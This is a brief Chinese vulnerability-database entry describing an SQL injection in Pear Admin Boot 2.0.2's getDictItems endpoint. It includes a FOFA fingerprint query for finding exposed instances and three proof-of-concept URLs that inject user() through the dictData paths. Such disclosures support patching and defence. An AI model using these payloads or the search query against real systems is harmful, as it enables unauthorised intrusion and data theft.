Pear-Admin-Boot存在SQL注入漏洞

在Pear Admin Boot 2.0.2版本中发现了一个漏洞，并被列为严重漏洞。此问题影响文件/system/dictData/getDictItems/的getDictItems函数。输入,user(),1,1 的操作会导致SQL注入。

fofa

1	`body="明湖区最具影响力的设计规范之一"`

poc

1
2
3

http://localhost:8088/system/dictData/getDictItems/gen_table,user(),1,1
http://localhost:8088/system/dictData/getDictItems/sys_user,user(),1
http://localhost:8088/system/dictData/loadDictItem/sys_user,user(),1?key=1

输入图片说明

漏洞知识库

Pkpmbs建设工程质量监督系统FileUpOrDown.ashx存在文件上传漏洞上一篇

PowerCreator接口UploadResourcePic.ashx存在任意文件上传漏洞下一篇